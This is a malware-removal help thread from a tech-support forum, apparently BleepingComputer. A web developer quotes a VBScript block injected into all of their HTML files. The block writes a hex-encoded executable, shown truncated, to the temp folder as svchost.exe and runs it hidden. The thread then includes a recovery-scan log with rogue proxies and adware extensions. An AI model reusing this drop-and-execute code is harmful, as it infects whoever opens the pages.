Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

All Html files get injected by VBscript svchost


  • This topic is locked This topic is locked
18 replies to this topic

#1 jsutbee

jsutbee

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 31 July 2014 - 04:10 AM

Well I am seeking  help as  having a very bad week as i'm infected and don't know by what.I think it all happened after i browse and used few serial and keygen cracking site which i was using to crack few data recovery software and i suddenly felt that im infected after using it.  After checking my files and system found my all html files get the  injected by script like

 

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B1 ............................................................................................................................................................................................................................................................................................................

....................................

....................................

and at end of file 
 

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--®JIô=_Q­N¯¨H6vlÕ¬^Bíx9e±f›ànþvѸgU=§¡,«A˜$­˜pÜpÊ.mõ•µ@`ºOT&Fú!%ãL|‹¼-{qöúÓ"©€A5sµ¼&ïòð;7cìAoOj@•²¾äî¤M[÷/Øg€ã«¥¤ü¾'vÞ¦XÑÆ™Kõ¿€÷û’´‘(‚x)r!x49²0€¤øщ†rÔ7bŠ¦]VåÓÍà¢7¦ƒæ_ò&½nà«yq艛œî2:l†7u|Ѐ¡HO~€}a¶tÕb}¼õë9lJ¬°a=x}õìPëÚÎÆÂT›úØORýF?±HMcÉ¡iñ‚ ZYK‹|§|lªyø9̇÷´6Àjš.e9’˜‘Ûj¿ÒR ±ÖFPC
 
with strange encoding got appended.

well Im a web developer and have lots of html files in my local wamp server. All php files seems ok. 
Im seeking a help @bleepingcomputer 

 

 



BC AdBot (Login to Remove)

 


#2 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 31 July 2014 - 11:25 PM

Sorry to bother you all again. 
Above injected script by svchost vbscript is now clear after using AVG antivirus. But my pc is having strange issues. 
previously i was unable to ping from cmd , but now its sovled too i can ping. But my other app is now corrupted i think. I can't run mongodb, mysql,python  and other app from command which i previously use from command prompt for which there is already a path defined in system environment variables.
Hope someone here can give me a way out of this. I just dont wanna format my pc.



#3 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 02 August 2014 - 01:56 PM

Greetings and :welcome: to BleepingComputer,
My name is xXToffeeXx, but feel free to call me Toffee if it is easier for you. I will be helping you with your malware problems.
 
A few points to cover before we start:

  • Do not run any tools without being instructed to as this makes my job much harder in trying to figure out what you have done.
  • Make sure to read my instructions fully before attempting a step.
  • If you have problems or questions with any of the steps, feel free to ask me. I will be happy to answer any questions you have.
  • Please follow the topic by clicking on the "Follow this topic" button, and make sure a tick is in the "receive notifications" and is set to "Instantly". Any replies should be made in this topic by clicking the "Reply to this topic" button.
  • Important information in my posts will often be in bold, make sure to take note of these.
  • I will attempt to reply as soon as possible, and normally within 24 hours of your reply. If this is not possible or I have a delay then I will let you know.
  • I will bump a topic after 3 days of no activity, and then will give you another 2 days to reply before a topic is closed. If you need more time than this please let me know.
  • Lets get going now :thumbup2:

==========================
 
Hi jsutbee,

 

If I believe this is what it is then I may have bad news for you, lets see this log though first.
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#4 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 04 August 2014 - 03:43 AM

Hi Toffee, hope you are having a great day :)

Thanks for your response. well i previously installed the AVG antivirus before getting any reply from here. I scanned the whole pc and recovered my html files too as i previously mentioned and AVG still detects few viruses to remove and its doing it job.

Well as per your suggestion i downloaded the FRST and scan my system, The scan gets stuck after "Getting office sessions errors: 5371" and no further scan continues. I tried several times but with no luck to scan completely.
The scan result of FRST.txt and Addition.txt are as follows:

FRST. TXT
-----------------------

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:2-08-2014
Ran by User (administrator) on BIKASH on 04-08-2014 13:50:18
Running from E:\Myfiles and backup\svchost remover
Platform: Microsoft Windows 7 Ultimate  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgcsrvx.exe
(Microsoft Corporation) C:\Windows\System32\audiodg.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\pg_ctl.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(Apache Software Foundation) C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(Apache Software Foundation) D:\wamp\bin\apache\Apache2.2.17\bin\httpd.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\loggingserver.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Google) C:\Program Files\Google\Google Talk\googletalk.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
() C:\Program Files\AVG Web TuneUp\vprot.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(FreeDownloadManager.ORG) C:\Program Files\Free Download Manager\fdm.exe
(WordWeb Software) C:\Program Files\WordWeb\wweb32.exe
() C:\Program Files\ownCloud\owncloud.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\Snagit32.exe
(Dropbox, Inc.) C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files\Evernote\Evernote\EvernoteClipper.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(http://tortoisesvn.net) C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
(Apache Software Foundation) C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
() D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgemcx.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\TscHelp.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\SnagPriv.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\SnagitEditor.exe
(Apache Software Foundation) D:\wamp\bin\apache\Apache2.2.17\bin\httpd.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdhost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [Free Download Manager] => C:\Program Files\Free Download Manager\fdm.exe [6875136 2014-07-30] (FreeDownloadManager.ORG)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [WordWeb] => C:\Program Files\WordWeb\wweb32.exe [77056 2013-05-16] (WordWeb Software)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21445248 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [ownCloud] => C:\Program Files\ownCloud\owncloud.exe [17381826 2014-06-26] ()
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [354304 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\MountPoints2: {f80c5e7a-954b-11e0-9744-6c626dc4e396} - G:\setup.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk
ShortcutTarget: Snagit 11.lnk -> C:\Program Files\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: "DropboxExt1" -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt2" -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt3" -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt4" -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt5" -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt6" -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt7" -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt8" -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: 1TortoiseNormal -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 2TortoiseModified -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 3TortoiseConflict -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 4TortoiseLocked -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 5TortoiseReadOnly -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 6TortoiseDeleted -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 7TortoiseAdded -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 8TortoiseIgnored -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 9TortoiseUnversioned -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 133.242.131.152:443
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=UP97&ocid=UP97DHP
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x1908234753B3CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {3AD893BD-313B-4CD7-9292-87769616B9E8} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=937811&p={searchTerms}
SearchScopes: HKCU - {BDFEF54B-1D63-415B-B63E-F96B4F95223A} URL = http://search.aol.com/aol/search?s_it=tb50winamp&q={searchTerms}
BHO: Media Watch -> {01d7c86a-b746-4647-afed-d88f7528f044} -> C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ie\MediaWatchV1home1288.dll No File
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Media Viewer -> {6edc79e0-4d6f-4de7-be61-f8e9bc80fd50} -> C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ie\MediaViewerV1alpha442.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Microsoft Web Test Recorder 10.0 Helper -> {876d9f09-c6d6-4324-a2cc-04dd9a4de12f} -> C:\Program Files\Microsoft Visual Studio 11.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
BHO: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO: Media Buzz -> {d0c64ff5-c2d4-4f66-9fa3-69d4846db615} -> C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ie\MediaBuzzV1mode6898.dll No File
BHO: Media View -> {d6f31e2c-0a30-4b60-a44c-141aa27478d4} -> C:\Program Files\MediaViewV1\MediaViewV1alpha678\ie\MediaViewV1alpha678.dll No File
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: Media Player -> {df68ab54-afc1-4005-aa2f-6a6ae5d2dea0} -> C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ie\MediaPlayerV1alpha583.dll No File
BHO: Zip Enhancer -> {E4935D75-87EE-40C6-B430-7434FB685DEC} -> C:\Program Files\AmiExt\ZipEnhancer\ie\AmiBho.dll No File
BHO: Rich Media View -> {f9aaacf6-0ca0-4ff4-8f71-d935d2eb86fd} -> C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ie\RichMediaViewV1release335.dll No File
Toolbar: HKLM - No Name - !{687578b9-7132-4a7a-80e4-30ee31099e03} -  No File
Toolbar: HKLM - No Name - !{F3FEE66E-E034-436a-86E4-9690573BEE8A} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\3.1.0\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\..\Interfaces\{63FC3279-79DA-467C-9214-685FFAC4C36B}: [NameServer]192.168.1.1
Tcpip\..\Interfaces\{DD3FC8E9-6A2B-4F35-A1CF-48A32145169C}: [NameServer]192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default
FF SearchEngineOrder.3: Bing 
FF NetworkProxy: "http", "125.195.133.102"
FF NetworkProxy: "http_port", 808
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\3.1.0\\npsitesafety.dll No File
FF Plugin: @java.com/DTPlugin,version=10.5.0 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.5.0 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @nullsoft.com/winampDetector;version=1 -> C:\Program Files\Winamp Detect\npwachk.dll (Nullsoft, Inc.)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\searchplugins\aol-search.xml
FF Extension: No Name - C:\Users\User\AppData\Roaming\Mozilla\Firefox\profiles\extensions\extensions [2014-07-25]
FF Extension: SavePass - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\RNEOMVW50611856@ZKVKQ22976610.com [2014-07-25]
FF Extension: Screen Capture Elite - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\screencaptureelite@plugin [2012-06-14]
FF Extension: No Name - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\staged [2014-08-01]
FF Extension: FireShot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba} [2014-06-11]
FF Extension: Firebug - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\firebug@software.joehewitt.com.xpi [2012-05-30]
FF Extension: FlashGot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2013-10-03]
FF Extension: MeasureIt - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{75CEEE46-9B64-46f8-94BF-54012DE155F0}.xpi [2014-03-04]
FF Extension: FireMobileSimulator - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{77cc852e-6b45-11dd-929f-d30256d89593}.xpi [2013-03-05]
FF Extension: FireFTP - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{a7c6cf7f-112c-4500-a7ea-39801a327e5f}.xpi [2014-07-14]
FF Extension: Modify Headers - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{b749fc7c-e949-447f-926c-3f4eed6accfe}.xpi [2014-01-21]
FF Extension: User Agent Switcher - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2014-01-21]
FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2014-05-06]
FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2014-05-06]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM\...\Firefox\Extensions: [fiddlerhook@fiddler2.com] - C:\Program Files\Fiddler2\FiddlerHook
FF Extension: FiddlerHook - C:\Program Files\Fiddler2\FiddlerHook [2013-04-11]
FF HKLM\...\Firefox\Extensions: [ext@zipenhancer.com] - C:\Program Files\AmiExt\ZipEnhancer\ff
FF HKLM\...\Firefox\Extensions: [ext@WebexpEnhancedV1alpha26.net] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff
FF HKLM\...\Firefox\Extensions: [ext@VideoPlayerV3beta10835.net] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaPlayerV1alpha583.net] - C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaViewerV1alpha442.net] - C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaViewV1alpha678.net] - C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaWatchV1home1288.net] - C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff
FF HKLM\...\Firefox\Extensions: [ext@MediaBuzzV1mode6898.net] - C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff
FF HKLM\...\Firefox\Extensions: [ext@RichMediaViewV1release335.net] - C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff
FF HKLM\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files\AVG\AVG2012\Thunderbird
FF Extension: AVG E-mail Scanner - C:\Program Files\AVG\AVG2012\Thunderbird [2012-02-05]
FF HKCU\...\Firefox\Extensions: [wcapturex@deskperience.com] - C:\Program Files\WordWeb\WCaptureMoz
FF Extension: WordWeb one-click lookup - C:\Program Files\WordWeb\WCaptureMoz [2013-10-09]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
